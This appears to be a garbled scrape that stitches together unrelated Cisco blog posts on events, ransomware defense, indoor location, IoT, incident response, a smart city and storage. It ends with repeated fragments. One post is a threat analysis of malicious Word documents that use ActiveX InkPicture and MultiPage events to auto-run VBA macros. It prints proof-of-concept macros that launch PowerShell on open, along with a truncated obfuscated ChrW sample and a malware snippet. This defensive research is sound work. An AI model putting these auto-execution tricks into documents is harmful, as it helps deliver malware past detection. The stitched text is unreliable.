Bruce Maas is CIO and Vice Provost for IT at the University of Wisconsin – Madison, and has been instrumental in developing the security vision for the university. He will talk about the importance of partnership between all stakeholders to achieve effective defenses.
Bob Turner is the Chief Information Security Officer with extensive experience in private industry and the public sector. He is going to talk about how University of Wisconsin – Madison is developing their threat detection and protection capabilities as a path to accomplishing the university’s goals. He will explain how they have partnered within the university, throughout the state and with external partners to develop their architecture. Bob will also discuss key elements introduced in the 2016 Cisco Annual Security Report.
I’ll also show how our latest technology can work in the NIST Cybersecurity Framework, so you can constrain the most advanced attackers and protect your university’s information.
I look forward to seeing you next Thursday morning at EDUCAUSE!
This post was authored by Edmund Brumaghin and Yves Younan
Summary
Ransomware has become increasingly prevalent in the industry, and in many cases, unless there is a publicly released decryptor available, there is often not an easy means of retrieving encrypted files once a system has been infected. In addition to the creation and maintenance of regular system backups, it is increasingly important to focus on a multi-tiered defense-in-depth network architecture in an effort to prevent initial endpoint infection. This is often difficult in an evolving threat landscape where new ransomware families are being developed and deployed seemingly every day by threat actors of varying levels of sophistication.
While many ransomware families focus on the encryption of all or portions of a target system’s files others, such as Petya, rely on overwriting the contents of the Master Boot Record (MBR) to force a system reboot then only encrypt the Master File Table (MFT) of the hard drive on infected systems as a way to coerce users into paying the threat actors to retrieve the encryption keys required to decrypt their files.
To help combat ransomware that attempts to modify the MBR, Talos has released a new tool to the open source community, MBRFilter, a driver that allows the MBR to be placed into a read-only mode, preventing malicious software from writing to or modifying the contents of this section of the storage device.
Over the past few years, location-based services such as Google Maps, Yelp, or OpenTable have become pervasive in our lives. In fact, 70 percent of smart phone customers now use location-based services. But similar, location-based services in the enterprise have lagged behind—despite its potential to transform the customer experience across industries such as healthcare, retail, and marketing.
Today Cisco is announcing innovative new technologies that will help bridge that gap and move high-location accuracy services from niche to mainstream in the enterprise. Cisco CMX – our Connected Mobile Experience – is introducing two solutions that deliver on the promise of high-accuracy indoor location for the enterprise.
The first solution, Cisco Beacon Point, uses virtual Bluetooth Low Energy beacons for indoor location services. The solution consists of a single appliance that can generate up to eight virtual beacons, a Cloud-based management dashboard, and SDK that uses the virtual beacons to determine location.
The second solution consists of Cisco Hyperlocation Solution and a client-side application. The enhanced Hyperlocation module and antenna plug into certain Cisco Aironet access points for improved location accuracy. The new client-side application augments that accuracy by leveraging the sensors on the mobile device for Wi-Fi high accuracy and near-real time refresh.
If the potential of indoor location based services is so obvious, then why has the enterprise lagged behind consumer technology?
The answer is actually quite simple. While technologies might seem the same on the surface, under the hood they the consumer and enterprise space differs greatly.
Historically, the adoption of enterprise-grade indoor location based services has been slow because they were seen as too expensive, they lacked expected accuracy, and the refresh rate lagged. Deployment was seen as complex because indoor location accuracy required an equally accurate infrastructure. And , the expectations of customers often outstripped the abilities of the technology.
Closing the gap
Now, with our combination of virtual beacon and Wi-Fi technologies, we’re helping to overcome these issues and close the gap between consumer and enterprise grade services.
This duo of technologies provides some key benefits. First, our virtual beacon solution overcomes the many management challenges of physical BLE beacons, including dead batteries, lost beacons, and complicated placement. Cisco Virtual Beacon Solution beacons are as easily deployed as dropping a pin on a Google map.
Second, no single technology is right for all high accuracy location use cases. Wi-Fi is optimal for analytics while virtual beacons are excellent for applications, such as proximity marketing, that require faster refresh rates.
Using Cisco’s advanced CMX capabilities, the solutions deliver highly accurate location services for the customer’s preferred technology, be it virtual beacon or Wi-FI giving it an edge over competitors.
We believe that with today’s announcement Cisco will make high-accuracy services a reality for the enterprise. The technology can finally move from niche to mainstream and become as ubiquitous as outdoor GPS location.
Let us know what you think? Could you use location-based services to reinvent how your business operates? We’re all ears.
Submitted by Kelsey Kusterer Ziser, the Editor of Upskill U at Light Reading
As service providers migrate traditional networks to virtualized networks, it’s no longer enough to only secure the perimeter. Threats from within the network are on the rise as hackers increasingly have access to more robust, inexpensive tools for launching attacks.
Yet just as hackers have more tools at their disposal, operators’ security efforts are being strengthened by machine learning and automated security measures that intelligently adapt and control the network via software-defined networking (SDN) elements. Any new security measure is only as strong as the strategies behind its deployment, and service providers are at a critical stage in re-thinking traditional network security strategies to keep pace with ever-growing and changing threats.
Beginning October 19, Light Reading, in association with Cisco, examines how service providers and data centers must shift their security strategies in light of virtualization and the growing use of open source software in a four-part series at Upskill U. During this free, online series, expert lecturers from AT&T, Tata Communications, Arbor Networks and Princeton University will address how service providers can keep pace with changing threats and take a proactive approach to network security.
Tune in to Upskill U for these exciting lectures in the Security series:
Securing a Virtual World (Wednesday, Oct. 19, 1:00 p.m. ET): Rita Marty, Executive Director, Mobility & Cloud Security, Chief Security Office, AT&T will take a look at how securing a virtual network differs from securing a traditional network, and examine the fundamental technical and mindset changes service providers need to make as they prepare for virtualized networks.
Security: Evolving the Data Center (Friday, Oct. 21, 1:00 p.m. ET): Rasool Kareem Irfan, Head, Telecom & Infrastructure Security Practice, Tata Communications Transformation Services Ltd., addresses how data center security can evolve alongside network transformation and meet stringent security compliances and audits.
Security: Tackling DDoS (Wednesday, Oct. 26, 1:00 p.m. ET): Gary Sockrider, Principal Security Technologist, Arbor Networks, examines how businesses can adopt DDoS countermeasures and redesign their network topology to protect their assets.
Security: The Plusses & Minuses of Open Source Software (Friday, Oct. 28, 1:00 p.m. ET): Nick Feamster, Acting Director, Center for Information Technology Policy, Princeton University, explains both the risks and benefits open source software presents to security measures.
Each 45-minute live session at Upskill U includes a Q&A with speakers, and all courses are recorded and archived so listeners can tune in and reskill anytime. Don’t get left in the dark – let Light Reading’s Upskill U be your guiding light amidst industry-wide changes. Register today for Upskill U’s Security series at www.lightreading.com/upskillu. I’ll see you on the chat boards!
“The only constant is change.” It’s an adage that goes back 2500 years to the Greek philosopher Heraclitus. But never has it been as true as it is today. Technology adoption is growing exponentially, driving change at a dizzying pace. Billions of devices are connecting to networks—most of them the sensors, controllers, and machines that power the Internet of Things (IoT). You probably see the rapid growth of connected devices in your own organization: on the manufacturing floor, in your logistics system, hospital or retail store. But are you seeing the corresponding business impact generated by connected processes and business models enabled by IoT?
Over the last 25 years, organizations have had to reinvent themselves every three to seven years to keep up with the pace of change. Companies that missed one technology transition might scramble to catch up, but missing two meant a slow fade to obscurity, irrelevance, and death. Just think about the rapid evolution from records, to cassettes, to CDs—with each transition creating new winners and losers. Today, the evolution has come full circle as digital streaming services have made any kind of physical media obsolete.
That kind of relentless change threatens the survival of many businesses. According to The Boston Consulting Group, only 19 percent of S&P 500 companies from 50 years ago are still in existence today. How can you ensure the survival of your business?
A new generation of leaders, makers, thinkers, and doers is meeting that change with flexibility and optimism, and transforming it into opportunity. In my upcoming book, Building the Internet of Things, I call these pioneers “Generation IoT.” These are the people who see the transformational power of IoT-driven processes, business models and new revenue streams. They are eager to champion and drive these opportunities in their organizations. These people know that IoT is not just one project, one training session, one change. They know that in order to succeed they and their organizations need to adjust and re-learn, over and over again.
Generation IoT is first defined by openness—open standards, open collaboration, open communications, and open, flexible business models. Members of Generation IoT can be found in IT or operational technology (OT). They can run the plant, or be part of the supply chain. They can be vendors, contractors, or CXOs. They can be young or old. All are willing to learn and take risks, and are good at building virtual teams internally and partnering externally. You can recognize these new winners not by their age or their titles—but by their ability to build and deploy agile, flexible business solutions.
Here’s an example: a decade ago, visionaries talked about mass customization—building mass-produced products to each individual buyer’s specifications. But it was difficult to implement efficiently and proved to be an idea ahead of its time. Today, IoT makes this concept much more practical and cost-effective because information can be shared in real time between every element in the supply chain. Buyers can click on the components they want. Suppliers and logistics providers can see what is being ordered and adjust their scheduling accordingly. Production systems can be retooled as needed. With the information flowing up and down the supply chain, all the necessary materials are at the production line when that customer’s order is being assembled, whether it’s a car or a three-piece suit.
With IoT, mass customization is not just a future possibility—it’s starting to happen. Daihatsu Motor Company is already using 3D printers to offer car buyers 10 colors and 15 base patterns to create their own “effect skins” for car exteriors. Each car rolls off the line customized for that individual buyer.
The key question—and it’s the focus of both my book and this blog series—is how it’s all supposed to happen.
Yes, vision is important. Pointing your organization toward where and how it needs to transform itself is key. But the road to realizing such vision is a multi-year, multi-phased journey and it starts with you successfully tackling one of today’s business problems. A low-risk, small project based on a well-established use-case is all that is needed to get going. Armed with the initial success, you can then pick a more complex problem and an IoT solution that will also have a bigger impact. IoT is a journey.
Along the way, you will break down silos and build understanding and cooperation among IT, OT, supply chain and finance. You will also bring in an ecosystem of partners for a complete, converged solution. The good news is that thousands of your peers have already started on the IoT journey. Based on their experiences, a set of best practices has emerged:
Have a big vision, but start with a small project using one of the four fast payback scenarios I outline in my book: connected operations, remote operations, predictive analytics, and predictive maintenance.
Build you own business case by comparing industry benchmarks with your own total cost of ownership data.
Get a C-suite sponsor, because you are not implementing one IoT project, you are starting on the journey that will transform your organization, your industry, and your career.
Build a cross-functional team; you need complementary skills, so maximize the chances of success by building support and buy-in across your entire organization.
Finally, recognize that we’re all relatively new at this. None of us have spent our careers on IoT – not yet. You can be an extremely valuable member of this transformation with the skills you have today. Whether you’re in Generation X, Y, or Z, you can be part of Generation IoT. Stay tuned for my next blog, where I’ll take a closer look at the four fast-payback paths to IoT.
Based on the cybersecurity news proliferating in the mainstream media today – from ransomware incidents to data breaches of massive proportions – it has become clear that organizations need to put security mechanisms in place to protect their IT infrastructure. Organizations commonly use anti-virus, firewall, intrusion prevention and other security technologies to protect themselves; but as we have continued to see, these organizations are not keeping up with both the technology and associated people and processes needed to combat an ever-changing threat landscape.
Additionally, despite the measures organizations are taking, security professionals also show mixed levels of confidence in terms of their ability to thwart attackers. According to Cisco’s 2016 Annual Security Report, only 51% of survey respondents strongly believe they can detect security weaknesses before they become full-blown incidents. Only 45 percent are confident in their ability to determine the scope of a network compromise, and to remediate the damage.
Week 3 of National Cyber Security Awareness Month is focused on recognizing and combating cybercrime. If you are responsible for the IT infrastructure of your organization, you must include incident response in your plan to protect your organization. Or, as I prefer to say: your plan must address threat management.
I have previously blogged about a threat management maturity model. The reality is most organizations today do not have mature threat management practices in place: response to incidents is handled on a case-by-base basis, and often in direct response to a breach. There is little strategic planning, lack of consistent processes, and perhaps more importantly a lack of continuous monitoring and response. This works for basic use cases, like addressing common malware and supporting compliance, but isn’t sufficient for more complex cases like ransomware or a mega breach, and it certainly isn’t going to be sufficient if your organization is moving toward a digital business model.
A growing number of organizations are turning to professional expertise to assist with incident response. The percentage of respondents in the 2016 Annual Security Report who outsourced incident response processes grew from 35% to 42% between 2014 and 2015.
I lead the Incident Response Services team at Cisco. We recognize that organizations are at various stages of maturity for threat management, so we’ve developed a portfolio of offers that can help bolster your program while you are building it out. Our portfolio includes:
Emergency Incident Response – This service is targeted for situations when you have experienced a breach. We address immediate concerns and help you build a plan to address the situation, contain damage and work with you on short term and longer term strategies to address underlying issues.
Incident Response Retainer – A growing number of customers are engaging our team by having us on retainer. In this arrangement, you work with a defined set of experts who are familiar with your environment and existing processes and work within defined response times. They augment your team, are ready when you need them, and supplement your own readiness plans.
Proactive Threat Hunting – An increasing number of organizations are not willing to wait for an incident to happen and are asking the question, “Are we already compromised?” We’ll work with you to design a custom hunt, deploy any needed technology, assess your environment to identify existing threats on your network, and then provide a prioritized action plan to increase your cyber hygiene.
Incident response must be a critical component of your security strategy. Educate yourself on what is required to establish a solid incident response program by reading this white paper. Be ready to respond: work with experts in threat management to ensure you’ve got the people, processes and technology in place.
The way that Jaipur looks at it, every few centuries a city needs an upgrade. As one of the biggest tourist destinations in India, Jaipur wanted to transform itself into a more modern, digital city to handle the needs of the people coming into their city. The capital of the Rajasthan province, Jaipur is also as the “Pink City” due to its rich cultural history and unique sights. Over 40 million tourists visit Jaipur every year, in addition to the 3.5 million people who call the Pink City home.
If Jaipur truly wanted to be a digital city, it needed a solution that would be robust enough to handle millions of devices on its network. The Jaipur Development Authroity (JDA)—the organization tasked with taking the city to the next level digitally—naturally turned to Cisco. The JDA explained that they wanted to see three outcomes with the new network:
• Uncompromised safety for all
• A simplified tourist experience
• Digital empowerment for citizens
In order to make sure that everyone and everything was connected at once, the Cisco team began to work on an infrastructure that included: Cisco Aironet 1700 Series indoor access points, Cisco Aironet 1500 Series outdoor access points, Cisco Catalyst 3850 Series Switches among other Cisco products.
The transformation of Jaipur into Digital Jaipur was a success! The plan allowed for advanced IP-based surveillance solutions installed in key locations and Cisco-created smart Wi-Fi hotspots throughout the city for tourists and locals. These new solutions have lead to a happier population that now have improved public services and user experience.
The future couldn’t be rosier for the Pink City.
To read the entire case study, go here and search for “Jaipur — September 2016”.
Data is growing at an astonishing rate. Trends like cloud, IoT and digitization are imposing higher demands on how data is managed, transported, backed up and restored. Increased business dependence on IT means downtime has more meaningful and tangible impact on business operations. There is almost universally increased focus on disaster recovery and business continuance along with the ability to scale and manage data efficiently.
To alleviate these concerns, Cisco today introduced new storage networking solutions that help customers to respond quickly to new business needs, control IT costs, meet compliance requirements and continue business during disruptions. The new Cisco solutions help customers not only with their Business continuance strategy but also to build and scale their data center of the future by enabling them to manage their businesses cost-effectively. With these announcements, Cisco further cements its market leadership in providing both choice and value for server and storage connectivity.
SAN-Extension/FCIP Module on Cisco MDS 9700 Storage Networking modular platforms to build highly available and redundant infrastructure: High-performance and high-density SAN Extension FCIP module to enable disaster recovery/business continuity solutions
Raising the bar of LAN/SAN convergence: Enhanced 10/40G Fibre Channel over Ethernet (FCoE) and 25G/50G/100G IP Storage Networking Capabilities on Nexus 9K – ACI mode and Standalone mode.
Reduce Operational cost via simplified management: The latest Data Center Network Manager (DCNM) (release 10.1) extends manageability of SAN/LAN to storage arrays, enabling customers to automate provision of end to end LAN /SAN and storage devices/arrays.
In late August we began to detect malicious Microsoft Word documents that contained VisualBasic (VB) macro code and the code appeared to be triggering when the document was opened. However, the documents did not contain any of the standard events used to launch VB macro code when a document is opened, including Document_Open, or Auto_Open events. Upon closer examination, all the documents contained the ActiveX InkPicture control and the Painted event. The InkPicture Painted event is triggered upon document open, just like the Document_Open event. Using ActiveX controls like InkPicture and events associated with it, an attacker can create malicious documents that launch VB macro code when the document is opened without using the standard document open event triggers. Security solutions that examine documents and only look for the standard document open events are likely to miss documents that use ActiveX controls like InkPicture to launch code when the document first opened.
Other vendors made note of the use of InkPicture ActiveX controls to launch VB macro code when the document is opened [1] [2].
It was also immediately obvious that InkPicture events other than Painted, like Painting or MouseHover, could be used to launch VB macro code at document open. In addition, Microsoft Office ActiveX controls other than InkPicture could also be used to launch VB macro code at document open.
We created a number of proof-of-concept documents using other events associated with InkPicture to observe how these samples behaved in the Threat Grid sandbox.
For example, this proof-of-concept sample launches powershell.exe using the InkPicture Painting event when the document opens.
Dim Once As Boolean
Private Sub InkPicture1_painting(ByVal hDC As Long, ByVal Rect As InkRectangle, Allow As Boolean)
If Once Then Exit Sub
Once = True
Shell ("powershell.exe")
End Sub
Figure 1: shows powershell.exe being launched using the InkPicture Painting event when document opens
This proof-of-concept sample launches powershell.exe using the InkPicture MouseHover event when the document opens, this event triggers when the mouse is on top of the InkPicture control, and triggers automatically if the the mouse starts over the document when it opens, or the user moves the mouse on top of the document while it is open.
Dim Once As Boolean
Private Sub InkPicture1_MouseHover()
If Once Then Exit Sub
Once = True
Shell ("powershell.exe")
End Sub
Figure 2: powershell.exe is launched using the InkPicture MouseHover event when the document opens
We added detection for these proof-of-concept samples as well as the means to detect new variants using other ActiveX controls.
Other researchers noted that InkPicture events in addition to Painted, and ActiveX controls other than InkPicture could be used to launch VB macros when a document was opened [3].
We have now begun to detect in-the-wild samples using InkPicture events other than Painted. We have also begun to detect in-the-wild samples using ActiveX controls other than InkPicture to launch VB macro code when a document is opened.
For example, we detected a very small number of documents using the MouseEnter event that is triggered at document open if the mouse is over the document.
Private Sub InkPicture1_MouseEnter()
Dim first As String
Dim second As String
Dim third As String
Dim fourth As String
Dim fifth As String
Dim sixth As String
Dim seventh As String
Dim eighth As String
Dim ninth As String
Dim tenth As String
Dim eleventh As String
Dim twelfth As String
Dim last As String
first = ChrW(99) & ChrW(109) & ChrW(100) & ChrW(46) & ChrW(101) & ChrW(120) & ChrW(101) & ChrW(32) & ChrW(47) & ChrW(99)
second = ChrW(32) & ChrW(80) & ChrW(111) & ChrW(119) & ChrW(101) & ChrW(114) & ChrW(83) & ChrW(104) & ChrW(101) & ChrW(108)
third = ChrW(108) & ChrW(32) & ChrW(40) & ChrW(78) & ChrW(101) & ChrW(119) &
Over the weekend of October 15 and 16 we detected a large number of documents using the ActiveX control MultiPage to automatically launch VB macro code at document open. These documents contain the ActiveX MultiPage control and use the associated Layout event. The Microsoft documentation indicates the Layout event triggers when, “… a form, Frame, or Multipage changes size.” [4]
The malicious documents, and proof-of-concept documents we created, demonstrate the MultiPage control’s Layout event will trigger automatically when a document opens.
This is an example of a the Layout event from a malicious sample:
Public Sub Adbvy_Layout(ByVal hdpmymr As Long)
If MdsMR Then Exit Sub
MdsMR = True
gHLPhAD
End Sub
Public Sub gHLPhAD()
On Error GoTo vdvunp
PAaPbaC
tcqmPm BXGkJ
Exit Sub
vdvunp:
End Sub
The ActiveX controls InkPicture and MultiPage are just 2 of many ActiveX controls supported by Microsoft Office. Many of these ActiveX controls have associated events that can be triggered if a document is simply opened and macros are enabled.
Microsoft Office does not enable untrusted macros by default, but based on the fact users can manually enable macros and the sheer volume of malicious documents with embedded VB macros we see, attackers are finding success using these kinds of documents. We expect to see attackers further expand the use of ActiveX controls and further evolve techniques to avoid detection.
Be sure to tune in to our webinar next week, The Ransomware Threat: New Tactics and How to Fight Back, where experts Eric Hulse and Josh Reynolds of Cisco Research and Efficacy Team (RET) will discuss the ransomware threat and how to fight back. Register to attend here.
Today Cisco is announcing innovative new technologies that will help bridge that gap and move high-location accuracy services from niche to mainstream in the enterprise. 
Yes, vision is important. Pointing your organization toward where and how it needs to transform itself is key. But the road to realizing such vision is a multi-year, multi-phased journey and it starts with you successfully tackling one of today’s business problems. A low-risk, small project based on a well-established use-case is all that is needed to get going. Armed with the initial success, you can then pick a more complex problem and an IoT solution that will also have a bigger impact. IoT is a journey.
Figure 1: shows powershell.exe being launched using the InkPicture Painting event when document opens